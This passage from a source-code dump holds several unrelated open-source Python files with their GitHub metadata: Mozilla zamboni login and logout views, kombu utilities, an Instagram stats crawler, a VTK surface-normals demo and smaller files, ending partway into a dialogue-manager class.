"""Query for a user matching a given email."""
if 'q' not in request.GET:
raise http.Http404()
data = {'status': 0, 'message': ''}
email = request.GET.get('q', '').strip()
dev_only = request.GET.get('dev', '1')
try:
dev_only = int(dev_only)
except ValueError:
dev_only = 1
if not email:
data.update(message=_('An email address is required.'))
return data
user = UserProfile.objects.filter(email=email)
if dev_only:
user = user.exclude(read_dev_agreement=None)
msg = _('A user with that email address does not exist.')
msg_dev = _('A user with that email address does not exist, or the user '
'has not yet accepted the developer agreement.')
if user:
data.update(status=1, id=user[0].id, name=user[0].name)
else:
data['message'] = msg_dev if dev_only else msg
return escape_all(data)
def _clean_next_url(request):
gets = request.GET.copy()
url = gets.get('to', settings.LOGIN_REDIRECT_URL)
if not is_safe_url(url, host=request.get_host()):
log.info(u'Unsafe redirect to %s' % url)
url = settings.LOGIN_REDIRECT_URL
gets['to'] = url
request.GET = gets
return request
def get_fxa_session(**kwargs):
return OAuth2Session(
settings.FXA_CLIENT_ID,
scope=u'profile',
**kwargs)
def fxa_oauth_api(name):
return urlparse.urljoin(settings.FXA_OAUTH_URL, 'v1/' + name)
def _fxa_authorize(fxa, client_secret, request, auth_response, userid):
token = fxa.fetch_token(
fxa_oauth_api('token'),
authorization_response=auth_response,
client_secret=client_secret)
res = fxa.post(fxa_oauth_api('verify'),
data=json.dumps({'token': token['access_token']}),
headers={'Content-Type': 'application/json'})
data = res.json()
if 'user' in data:
email = data['email']
fxa_uid = data['user']
def find_user(**kwargs):
try:
return UserProfile.objects.get(**kwargs)
except UserProfile.DoesNotExist:
return None
profile = (find_user(pk=userid) or find_user(username=fxa_uid)
or find_user(email=email))
if profile:
profile.update(username=fxa_uid, email=email)
else:
profile = UserProfile.objects.create(
username=fxa_uid,
email=email,
source=amo.LOGIN_SOURCE_FXA,
display_name=email.partition('@')[0],
is_verified=True)
log_cef('New Account', 5, request, username=fxa_uid,
signature='AUTHNOTICE',
msg='User created a new account (from FxA)')
record_action('new-user', request)
if profile.source != amo.LOGIN_SOURCE_FXA:
profile.update(source=amo.LOGIN_SOURCE_FXA)
auth.login(request, profile)
profile.log_login_attempt(True)
auth.signals.user_logged_in.send(sender=profile.__class__,
request=request, user=profile)
return profile
def browserid_authenticate(request, assertion, is_mobile=False,
browserid_audience=get_audience):
"""
Verify a BrowserID login attempt. If the BrowserID assertion is
good, but no account exists, create one.
"""
extra_params = {}
if waffle.switch_is_active('firefox_accounts'):
url = settings.NATIVE_FXA_VERIFICATION_URL
else:
url = settings.BROWSERID_VERIFICATION_URL
# We must always force the Firefox OS identity provider. This is
# because we are sometimes allowing unverified assertions and you
# can't mix that feature with bridged IdPs. See bug 910938.
if settings.UNVERIFIED_ISSUER:
extra_params['experimental_forceIssuer'] = settings.UNVERIFIED_ISSUER
if is_mobile:
# When persona is running in a mobile OS then we can allow
# unverified assertions.
url = settings.NATIVE_BROWSERID_VERIFICATION_URL
extra_params['experimental_allowUnverified'] = 'true'
log.debug('Verifying Persona at %s, audience: %s, '
'extra_params: %s' % (url, browserid_audience, extra_params))
v = BrowserIDBackend().get_verifier()
v.verification_service_url = url
result = v.verify(assertion, browserid_audience, url=url, **extra_params)
if not result:
return None, _('Persona authentication failure.')
if 'unverified-email' in result._response:
email = result._response['unverified-email']
verified = False
elif (result._response.get['issuer'] == settings.NATIVE_FXA_ISSUER and
'fxa-verifiedEmail' in result._response.get('idpClaims', {})):
email = result._response['idpClaims']['fxa-verifiedEmail']
verified = True
else:
email = result.email
verified = True
try:
profile = UserProfile.objects.filter(email=email)[0]
except IndexError:
profile = None
if profile:
if profile.is_verified and not verified:
# An attempt to log in to a verified address with an unverified
# assertion is a very bad thing. Don't let that happen.
log.debug('Verified user %s attempted to log in with an '
'unverified assertion!' % profile)
return None, _('Please use the verified email for this account.')
else:
profile.is_verified = verified
profile.save()
return profile, None
username = autocreate_username(email.partition('@')[0])
source = amo.LOGIN_SOURCE_MMO_BROWSERID
profile = UserProfile.objects.create(username=username, email=email,
source=source, display_name=username,
is_verified=verified)
log_cef('New Account', 5, request, username=username,
signature='AUTHNOTICE',
msg='User created a new account (from Persona)')
record_action('new-user', request)
return profile, None
@csrf_exempt
@require_POST
@transaction.commit_on_success
def browserid_login(request, browserid_audience=None):
msg = ''
if request.user.is_authenticated():
# If username is different, maybe sign in as new user?
return http.HttpResponse(status=200)
try:
is_mobile = bool(int(request.POST.get('is_mobile', 0)))
except ValueError:
is_mobile = False
with statsd.timer('auth.browserid.verify'):
profile, msg = browserid_authenticate(
request, request.POST.get('assertion'),
is_mobile=is_mobile,
browserid_audience=browserid_audience or get_audience(request))
if profile is not None:
auth.login(request, profile)
profile.log_login_attempt(True)
return http.HttpResponse(status=200)
return http.HttpResponse(msg, status=401)
# Used by mkt.developers.views:login.
def _login(request, template=None, data=None, dont_redirect=False):
data = data or {}
data['webapp'] = True
if 'to' in request.GET:
request = _clean_next_url(request)
data['to'] = request.GET.get('to')
if request.user.is_authenticated():
return http.HttpResponseRedirect(
request.GET.get('to', settings.LOGIN_REDIRECT_URL))
return TemplateResponse(request, template, data)
def logout(request):
user = request.user
if not user.is_anonymous():
log.debug(u"User (%s) logged out" % user)
auth.logout(request)
if 'to' in request.GET:
request = _clean_next_url(request)
next = request.GET.get('to')
if not next:
next = settings.LOGOUT_REDIRECT_URL
response = http.HttpResponseRedirect(next)
# Fire logged out signal.
logged_out.send(None, request=request, response=response)
return response
|
{
"content_hash": "272fd5582ec1d0935f4a5f935c9aebde",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 81,
"avg_line_length": 32.98287671232877,
"alnum_prop": 0.628179835946423,
"repo_name": "ngokevin/zamboni",
"id": "7b495f1f0346727eb2b729ab238104357654b16f",
"size": "9631",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mkt/users/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "356777"
},
{
"name": "JavaScript",
"bytes": "536388"
},
{
"name": "Python",
"bytes": "3883015"
},
{
"name": "Shell",
"bytes": "13597"
}
],
"symlink_target": ""
}
|
from ...scheme import Scheme
from ..schemeinfo import SchemeInfoDialog
from ...gui import test
class TestSchemeInfo(test.QAppTestCase):
def test_scheme_info(self):
scheme = Scheme(title="A Scheme", description="A String\n")
dialog = SchemeInfoDialog()
dialog.setScheme(scheme)
status = dialog.exec_()
if status == dialog.Accepted:
self.assertEqual(scheme.title.strip(),
str(dialog.editor.name_edit.text()).strip())
self.assertEqual(scheme.description,
str(dialog.editor.desc_edit \
.toPlainText()).strip())
|
{
"content_hash": "92f98d8804d0721bcedc377a0bf1762d",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 73,
"avg_line_length": 35.78947368421053,
"alnum_prop": 0.5720588235294117,
"repo_name": "cheral/orange3",
"id": "8ae117fe2469d9b2443414456b18d7246c9688f9",
"size": "680",
"binary": false,
"copies": "18",
"ref": "refs/heads/master",
"path": "Orange/canvas/application/tests/test_schemeinfo.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12023"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20217"
},
{
"name": "Python",
"bytes": "4139574"
},
{
"name": "Shell",
"bytes": "47441"
}
],
"symlink_target": ""
}
|
"""
kombu.utils
===========
Internal utilities.
"""
from __future__ import absolute_import, print_function
import importlib
import numbers
import random
import sys
from contextlib import contextmanager
from itertools import count, repeat
from functools import wraps
from time import sleep
from uuid import UUID, uuid4 as _uuid4, _uuid_generate_random
from kombu.five import items, reraise, string_t
from .encoding import default_encode, safe_repr as _safe_repr
try:
import ctypes
except:
ctypes = None # noqa
try:
from io import UnsupportedOperation
FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation)
except ImportError: # pragma: no cover
# Py2
FILENO_ERRORS = (AttributeError, ValueError) # noqa
__all__ = ['EqualityDict', 'say', 'uuid', 'kwdict', 'maybe_list',
'fxrange', 'fxrangemax', 'retry_over_time',
'emergency_dump_state', 'cached_property',
'reprkwargs', 'reprcall', 'nested', 'fileno', 'maybe_fileno']
def symbol_by_name(name, aliases={}, imp=None, package=None,
sep='.', default=None, **kwargs):
"""Get symbol by qualified name.
The name should be the full dot-separated path to the class::
modulename.ClassName
Example::
celery.concurrency.processes.TaskPool
^- class name
or using ':' to separate module and symbol::
celery.concurrency.processes:TaskPool
If `aliases` is provided, a dict containing short name/long name
mappings, the name is looked up in the aliases first.
Examples:
>>> symbol_by_name('celery.concurrency.processes.TaskPool')
<class 'celery.concurrency.processes.TaskPool'>
>>> symbol_by_name('default', {
... 'default': 'celery.concurrency.processes.TaskPool'})
<class 'celery.concurrency.processes.TaskPool'>
# Does not try to look up non-string names.
>>> from celery.concurrency.processes import TaskPool
>>> symbol_by_name(TaskPool) is TaskPool
True
"""
if imp is None:
imp = importlib.import_module
if not isinstance(name, string_t):
return name # already a class
name = aliases.get(name) or name
sep = ':' if ':' in name else sep
module_name, _, cls_name = name.rpartition(sep)
if not module_name:
cls_name, module_name = None, package if package else cls_name
try:
try:
module = imp(module_name, package=package, **kwargs)
except ValueError as exc:
reraise(ValueError,
ValueError("Couldn't import {0!r}: {1}".format(name, exc)),
sys.exc_info()[2])
return getattr(module, cls_name) if cls_name else module
except (ImportError, AttributeError):
if default is None:
raise
return default
class HashedSeq(list):
"""type used for hash() to make sure the hash is not generated
multiple times."""
__slots__ = 'hashvalue'
def __init__(self, *seq):
self[:] = seq
self.hashvalue = hash(seq)
def __hash__(self):
return self.hashvalue
def eqhash(o):
try:
return o.__eqhash__()
except AttributeError:
return hash(o)
class EqualityDict(dict):
def __getitem__(self, key):
h = eqhash(key)
if h not in self:
return self.__missing__(key)
return dict.__getitem__(self, h)
def __setitem__(self, key, value):
return dict.__setitem__(self, eqhash(key), value)
def __delitem__(self, key):
return dict.__delitem__(self, eqhash(key))
def say(m, *fargs, **fkwargs):
print(str(m).format(*fargs, **fkwargs), file=sys.stderr)
def uuid4():
# Workaround for http://bugs.python.org/issue4607
if ctypes and _uuid_generate_random: # pragma: no cover
buffer = ctypes.create_string_buffer(16)
_uuid_generate_random(buffer)
return UUID(bytes=buffer.raw)
return _uuid4()
def uuid():
"""Generate a unique id, having - hopefully - a very small chance of
collision.
For now this is provided by :func:`uuid.uuid4`.
"""
return str(uuid4())
gen_unique_id = uuid
if sys.version_info >= (2, 6, 5):
def kwdict(kwargs):
return kwargs
else:
def kwdict(kwargs): # pragma: no cover # noqa
"""Make sure keyword arguments are not in Unicode.
This should be fixed in newer Python versions,
see: http://bugs.python.org/issue4978.
"""
return dict((key.encode('utf-8'), value)
for key, value in items(kwargs))
def maybe_list(v):
if v is None:
return []
if hasattr(v, '__iter__'):
return v
return [v]
def fxrange(start=1.0, stop=None, step=1.0, repeatlast=False):
cur = start * 1.0
while 1:
if not stop or cur <= stop:
yield cur
cur += step
else:
if not repeatlast:
break
yield cur - step
def fxrangemax(start=1.0, stop=None, step=1.0, max=100.0):
sum_, cur = 0, start * 1.0
while 1:
if sum_ >= max:
break
yield cur
if stop:
cur = min(cur + step, stop)
else:
cur += step
sum_ += cur
def retry_over_time(fun, catch, args=[], kwargs={}, errback=None,
max_retries=None, interval_start=2, interval_step=2,
interval_max=30, callback=None):
"""Retry the function over and over until max retries is exceeded.
For each retry we sleep a for a while before we try again, this interval
is increased for every retry until the max seconds is reached.
:param fun: The function to try
:param catch: Exceptions to catch, can be either tuple or a single
exception class.
:keyword args: Positional arguments passed on to the function.
:keyword kwargs: Keyword arguments passed on to the function.
:keyword errback: Callback for when an exception in ``catch`` is raised.
The callback must take two arguments: ``exc`` and ``interval``, where
``exc`` is the exception instance, and ``interval`` is the time in
seconds to sleep next..
:keyword max_retries: Maximum number of retries before we give up.
If this is not set, we will retry forever.
:keyword interval_start: How long (in seconds) we start sleeping between
retries.
:keyword interval_step: By how much the interval is increased for each
retry.
:keyword interval_max: Maximum number of seconds to sleep between retries.
"""
retries = 0
interval_range = fxrange(interval_start,
interval_max + interval_start,
interval_step, repeatlast=True)
for retries in count():
try:
return fun(*args, **kwargs)
except catch as exc:
if max_retries and retries >= max_retries:
raise
if callback:
callback()
tts = float(errback(exc, interval_range, retries) if errback
else next(interval_range))
if tts:
for _ in range(int(tts)):
if callback:
callback()
sleep(1.0)
# sleep remainder after int truncation above.
sleep(abs(int(tts) - tts))
def emergency_dump_state(state, open_file=open, dump=None):
from pprint import pformat
from tempfile import mktemp
if dump is None:
import pickle
dump = pickle.dump
persist = mktemp()
say('EMERGENCY DUMP STATE TO FILE -> {0} <-', persist)
fh = open_file(persist, 'w')
try:
try:
dump(state, fh, protocol=0)
except Exception as exc:
say('Cannot pickle state: {0!r}. Fallback to pformat.', exc)
fh.write(default_encode(pformat(state)))
finally:
fh.flush()
fh.close()
return persist
class cached_property(object):
"""Property descriptor that caches the return value
of the get function.
*Examples*
.. code-block:: python
@cached_property
def connection(self):
return Connection()
@connection.setter # Prepares stored value
def connection(self, value):
if value is None:
raise TypeError('Connection must be a connection')
return value
@connection.deleter
def connection(self, value):
# Additional action to do at del(self.attr)
if value is not None:
print('Connection {0!r} deleted'.format(value)
"""
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.__get = fget
self.__set = fset
self.__del = fdel
self.__doc__ = doc or fget.__doc__
self.__name__ = fget.__name__
self.__module__ = fget.__module__
def __get__(self, obj, type=None):
if obj is None:
return self
try:
return obj.__dict__[self.__name__]
except KeyError:
value = obj.__dict__[self.__name__] = self.__get(obj)
return value
def __set__(self, obj, value):
if obj is None:
return self
if self.__set is not None:
value = self.__set(obj, value)
obj.__dict__[self.__name__] = value
def __delete__(self, obj):
if obj is None:
return self
try:
value = obj.__dict__.pop(self.__name__)
except KeyError:
pass
else:
if self.__del is not None:
self.__del(obj, value)
def setter(self, fset):
return self.__class__(self.__get, fset, self.__del)
def deleter(self, fdel):
return self.__class__(self.__get, self.__set, fdel)
def reprkwargs(kwargs, sep=', ', fmt='{0}={1}'):
return sep.join(fmt.format(k, _safe_repr(v)) for k, v in items(kwargs))
def reprcall(name, args=(), kwargs={}, sep=', '):
return '{0}({1}{2}{3})'.format(
name, sep.join(map(_safe_repr, args or ())),
(args and kwargs) and sep or '',
reprkwargs(kwargs, sep),
)
@contextmanager
def nested(*managers): # pragma: no cover
# flake8: noqa
"""Combine multiple context managers into a single nested
context manager."""
exits = []
vars = []
exc = (None, None, None)
try:
try:
for mgr in managers:
exit = mgr.__exit__
enter = mgr.__enter__
vars.append(enter())
exits.append(exit)
yield vars
except:
exc = sys.exc_info()
finally:
while exits:
exit = exits.pop()
try:
if exit(*exc):
exc = (None, None, None)
except:
exc = sys.exc_info()
if exc != (None, None, None):
# Don't rely on sys.exc_info() still containing
# the right information. Another exception may
# have been raised and caught by an exit method
reraise(exc[0], exc[1], exc[2])
finally:
del(exc)
def shufflecycle(it):
it = list(it) # don't modify callers list
shuffle = random.shuffle
for _ in repeat(None):
shuffle(it)
yield it[0]
def entrypoints(namespace):
try:
from pkg_resources import iter_entry_points
except ImportError:
return iter([])
return ((ep, ep.load()) for ep in iter_entry_points(namespace))
class ChannelPromise(object):
def __init__(self, contract):
self.__contract__ = contract
def __call__(self):
try:
return self.__value__
except AttributeError:
value = self.__value__ = self.__contract__()
return value
def __repr__(self):
try:
return repr(self.__value__)
except AttributeError:
return '<promise: 0x{0:x}>'.format(id(self.__contract__))
def escape_regex(p, white=''):
# what's up with re.escape? that code must be neglected or someting
return ''.join(c if c.isalnum() or c in white
else ('\\000' if c == '\000' else '\\' + c)
for c in p)
def fileno(f):
if isinstance(f, numbers.Integral):
return f
return f.fileno()
def maybe_fileno(f):
"""Get object fileno, or :const:`None` if not defined."""
try:
return fileno(f)
except FILENO_ERRORS:
pass
|
{
"content_hash": "6436a0489ecaaec3b27ea77448a163c3",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 28.286666666666665,
"alnum_prop": 0.5640663052871396,
"repo_name": "johankaito/fufuka",
"id": "0745ddfef7bf4e5f8fb4c96be88df0839c7bac08",
"size": "12729",
"binary": false,
"copies": "20",
"ref": "refs/heads/master",
"path": "microblog/flask/venv/lib/python2.7/site-packages/kombu/utils/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "70167"
},
{
"name": "C",
"bytes": "993849"
},
{
"name": "C++",
"bytes": "4924114"
},
{
"name": "CSS",
"bytes": "57195"
},
{
"name": "Fortran",
"bytes": "10375"
},
{
"name": "HTML",
"bytes": "3832217"
},
{
"name": "Java",
"bytes": "608432"
},
{
"name": "JavaScript",
"bytes": "48304"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "575902"
},
{
"name": "Python",
"bytes": "41068291"
},
{
"name": "Shell",
"bytes": "952977"
},
{
"name": "XSLT",
"bytes": "46584"
}
],
"symlink_target": ""
}
|
"""Goes through all usernames and collects their information"""
import sys
import arrow
from selenium.common.exceptions import NoSuchElementException
from util.account import login
from util.chromedriver import SetupBrowserEnvironment
from util.extractor import extract_information
from util.extractor_posts import InstagramPost
from util.exceptions import PageNotFound404, NoInstaPostPageFound
from util.settings import Settings
Settings.chromedriver_location = '/usr/bin/chromedriver'
def get_posts_from_username(username, caption, limit_amount):
with SetupBrowserEnvironment() as browser:
instagram_stats = []
ig_stats, _ = extract_information(browser, username, limit_amount)
now_datetime = arrow.now('US/Pacific')
for post in ig_stats.posts:
post_caption = post['caption']
if caption in post_caption:
post_stats = {
'username': username,
'post_url': post['url'],
'likes': post['likes']['count'],
'views': post['views'],
'caption': post_caption,
'checked_date': now_datetime.format('MM-DD-YYYY'),
'checked_time': now_datetime.format('hh:mm:ss A'),
'still_up': True,
}
instagram_stats.append(post_stats)
return instagram_stats
def get_post_from_url(post_url):
with SetupBrowserEnvironment() as browser:
now_datetime = arrow.now('US/Pacific')
try:
instagram_post = InstagramPost(browser, post_url)
instagram_post.extract_post_info()
post_stats = {
'username': instagram_post.username,
'post_url': post_url,
'likes': instagram_post.likes,
'views': instagram_post.views,
'caption': instagram_post.caption,
'checked_date': now_datetime.format('MM-DD-YYYY'),
'checked_time': now_datetime.format('hh:mm:ss A'),
'still_up': True
}
except NoInstaPostPageFound:
post_stats = {
'post_url': post_url,
'checked_date': now_datetime.format('MM-DD-YYYY'),
'checked_time': now_datetime.format('hh:mm:ss A'),
'still_up': False
}
return [post_stats]
|
{
"content_hash": "a292a31ebf1923f9a6a7579fe4e627b1",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 74,
"avg_line_length": 35.544117647058826,
"alnum_prop": 0.5771617707902358,
"repo_name": "timgrossmann/instagram-profilecrawl",
"id": "405c3cfea34a52afa79bff9852b8046c70ce94a1",
"size": "2442",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quickstart_templates/parse_instagram.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "1223"
},
{
"name": "Python",
"bytes": "68413"
},
{
"name": "Shell",
"bytes": "1860"
}
],
"symlink_target": ""
}
|
from swf.actors.core import Actor # NOQA
from swf.actors.worker import ActivityWorker # NOQA
from swf.actors.decider import Decider # NOQA
|
{
"content_hash": "dee69147105a7cdb2af9aeb3227ae3bb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 52,
"avg_line_length": 47.333333333333336,
"alnum_prop": 0.7887323943661971,
"repo_name": "botify-labs/simpleflow",
"id": "3b06f79cac45b62433faf83fea118029254f12b3",
"size": "166",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "swf/actors/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "298"
},
{
"name": "Python",
"bytes": "801698"
},
{
"name": "Shell",
"bytes": "4481"
}
],
"symlink_target": ""
}
|
"""
"""
import vtk
def main():
colors = vtk.vtkNamedColors()
fileName = get_program_parameters()
polyData = ReadPolyData(fileName)
# A renderer.
renderer = vtk.vtkRenderer()
renderer.SetBackground(colors.GetColor3d("White"))
# Create background colors for each viewport.
backgroundColors = list()
backgroundColors.append(colors.GetColor3d("Cornsilk"))
backgroundColors.append(colors.GetColor3d("NavajoWhite"))
backgroundColors.append(colors.GetColor3d("Tan"))
# Create a renderer for each view port.
ren = list()
ren.append(vtk.vtkRenderer())
ren.append(vtk.vtkRenderer())
ren.append(vtk.vtkRenderer())
ren[0].SetViewport(0, 0, 1.0 / 3.0, 1) # Input
ren[1].SetViewport(1.0 / 3.0, 0, 2.0 / 3.0, 1) # Normals (no split)
ren[2].SetViewport(2.0 / 3.0, 0, 1, 1) # Normals (split)
# Shared camera.
camera = vtk.vtkCamera()
normals = vtk.vtkPolyDataNormals()
normals.SetInputData(polyData)
normals.SetFeatureAngle(30.0)
for i in range(0, 3):
if i == 0:
normals.ComputePointNormalsOff()
elif i == 1:
normals.ComputePointNormalsOn()
normals.SplittingOff()
else:
normals.ComputePointNormalsOn()
normals.SplittingOn()
normals.Update()
normalsPolyData = vtk.vtkPolyData()
normalsPolyData.DeepCopy(normals.GetOutput())
# mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(normalsPolyData)
mapper.ScalarVisibilityOff()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetDiffuseColor(colors.GetColor3d("Peacock"))
actor.GetProperty().SetDiffuse(.7)
actor.GetProperty().SetSpecularPower(20)
actor.GetProperty().SetSpecular(.5)
# add the actor
ren[i].SetBackground(backgroundColors[i])
ren[i].SetActiveCamera(camera)
ren[i].AddActor(actor)
# Render window.
renwin = vtk.vtkRenderWindow()
renwin.AddRenderer(ren[0])
renwin.AddRenderer(ren[1])
renwin.AddRenderer(ren[2])
# An interactor.
interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renwin)
renwin.SetSize(900, 300)
ren[0].GetActiveCamera().SetFocalPoint(0, 0, 0)
ren[0].GetActiveCamera().SetPosition(1, 0, 0)
ren[0].GetActiveCamera().SetViewUp(0, 0, -1)
ren[0].ResetCamera()
ren[0].GetActiveCamera().Azimuth(120)
ren[0].GetActiveCamera().Elevation(30)
ren[0].GetActiveCamera().Dolly(1.1)
ren[0].ResetCameraClippingRange()
renwin.Render()
ren[0].ResetCamera()
renwin.Render()
# Start.
interactor.Initialize()
interactor.Start()
def get_program_parameters():
import argparse
description = 'Surface normal generation.'
epilogue = '''
(a) Faceted model without normals.
(b) Polygons must be consistently oriented to accurately compute normals.
(c) Sharp edges are poorly represented using shared normals as shown on the corners of this model.
(d) Normal generation with sharp edges split.
'''
parser = argparse.ArgumentParser(description=description, epilog=epilogue,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('filename1', help='42400-IDGH.stl.')
args = parser.parse_args()
return args.filename1
def ReadPolyData(file_name):
import os
path, extension = os.path.splitext(file_name)
extension = extension.lower()
if extension == ".ply":
reader = vtk.vtkPLYReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtp":
reader = vtk.vtkXMLpoly_dataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".obj":
reader = vtk.vtkOBJReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".stl":
reader = vtk.vtkSTLReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".vtk":
reader = vtk.vtkpoly_dataReader()
reader.SetFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
elif extension == ".g":
reader = vtk.vtkBYUReader()
reader.SetGeometryFileName(file_name)
reader.Update()
poly_data = reader.GetOutput()
else:
# Return a None if the extension is unknown.
poly_data = None
return poly_data
if __name__ == '__main__':
main()
|
{
"content_hash": "12608c626187afc32d261238087232c4",
"timestamp": "",
"source": "github",
"line_count": 158,
"max_line_length": 102,
"avg_line_length": 29.949367088607595,
"alnum_prop": 0.635883347421809,
"repo_name": "lorensen/VTKExamples",
"id": "5d722bc3e513765a1644a81c937b0f8800da02a1",
"size": "4755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Python/Visualization/NormalsDemo.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "322226"
},
{
"name": "C++",
"bytes": "4187688"
},
{
"name": "CMake",
"bytes": "155244"
},
{
"name": "CSS",
"bytes": "556"
},
{
"name": "G-code",
"bytes": "377583"
},
{
"name": "GLSL",
"bytes": "5375"
},
{
"name": "HTML",
"bytes": "635483160"
},
{
"name": "Java",
"bytes": "629442"
},
{
"name": "JavaScript",
"bytes": "18199"
},
{
"name": "Python",
"bytes": "1376010"
},
{
"name": "Shell",
"bytes": "3481"
}
],
"symlink_target": ""
}
|
"""mike URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
|
{
"content_hash": "f5fb496d5ef7241079309a4d05233746",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 79,
"avg_line_length": 36.23809523809524,
"alnum_prop": 0.6990801576872536,
"repo_name": "N0stack/mike",
"id": "92f541de9823b8aab15a6845f5f31729818bac16",
"size": "761",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/mike/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53041"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import sys
from google.api_core.protobuf_helpers import get_messages
from google.api import http_pb2
from google.cloud.trace_v1.proto import trace_pb2
from google.protobuf import descriptor_pb2
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
_shared_modules = [http_pb2, descriptor_pb2, empty_pb2, timestamp_pb2]
_local_modules = [trace_pb2]
names = []
for module in _shared_modules:
for name, message in get_messages(module).items():
setattr(sys.modules[__name__], name, message)
names.append(name)
for module in _local_modules:
for name, message in get_messages(module).items():
message.__module__ = "google.cloud.trace_v1.types"
setattr(sys.modules[__name__], name, message)
names.append(name)
__all__ = tuple(sorted(names))
|
{
"content_hash": "01410947bad1dccf6b86ecb5aa9c97db",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 70,
"avg_line_length": 30.5,
"alnum_prop": 0.7142857142857143,
"repo_name": "dhermes/gcloud-python",
"id": "bb7c6a2415566149645d785a0aa835d67216e6c8",
"size": "1456",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "trace/google/cloud/trace_v1/types.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "95635"
},
{
"name": "Python",
"bytes": "2871895"
},
{
"name": "Shell",
"bytes": "4683"
}
],
"symlink_target": ""
}
|
import os,sys,random,time,pickle,string
#import pyaudio
#import wave
class dialogue_manager:
def __init__(self, pta, path_to_experiment, path_to_spf, given_words, log_filename, run_offline, alog_filename=None, poll_filename=None, push_filename=None, core_filename=None, session_id=None):
#input types
self.vocalize_with_TTS = False
self.input_with_ASR = False
#manager tools
self.pta = pta
self.path_to_experiment = path_to_experiment
self.path_to_spf = path_to_spf
self.known_words = given_words
self.new_given_words(given_words)
self.log_filename = log_filename
self.run_offline = run_offline #if running offline, operations happen step-wise instead of continuously between user inputs (ie system shuts down)
self.alog_filename = alog_filename
self.poll_filename = poll_filename
self.push_filename = push_filename
self.core_filename = core_filename
self.session_id = session_id
self.responses_from_robot = []
#manager state information
self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #action, patient, recipient triple and their confidences
self.current_asp_confidence = [{},{},{}] #distributions of confidence over possible grounded referents
self.asp_role_map = {"action":0,"patient":1,"recipient":2}
self.request_type = "user_initiative" #can also be system-initiative,terminate
self.role_requested = None #if system-initiative request, this holds the role requested from the user
self.last_apr = None
self.last_role_requested = None #these two together form the previous state chosen by the dialogue manager
#self.all_unmapped_words = {} #to be used during clarification dialogues and for retraining ontology
self.utterance_parse_pairs = [] #to be used during retraining
self.roles_relatively_confident_about = None
#local state information for the dialogue
self.utterances_for_goal = [] #local utterances used during current dialogue to describe high-level, open-ended goal (cleared each time new dialogue starts)
self.utterances_for_clarification = [] #used in alignment guesses but need to be kept separate from main goal utterances and other clarification sub-dialogue utterances
self.utterances_during_dialogue = {} #indexed by request type (goal, sentence component), contains lists of utterances used to describe same goal/component for re-training
self.dialogue_accepted_parses = {} #indexed by request type (goal, sentence component), contains parse chosen as correct for that request
#self.unmapped_words_from_utterances = [] #unmapped words from utterances in current dialogue (wrapped into all unmapped words structure at dialogue's end)
#manager classification parameters
self.utterance_class_keywords = {}
self.utterance_class_keywords["yes"] = ["yes","yeah","sure","right","correct"]
self.utterance_class_keywords["no"] = ["no","nope","incorrect","wrong","not right"]
self.utterance_class_keywords["nevermind"] = ["nevermind","wrong","misunderstood","don't","dont","nothing"]
#manager adjustable / learnable parameters
self.max_asr_understandings_to_consider = 4
self.min_confidence_to_accept = 0.95 #when all arguments of understanding meet this confidence, dialogue terminates
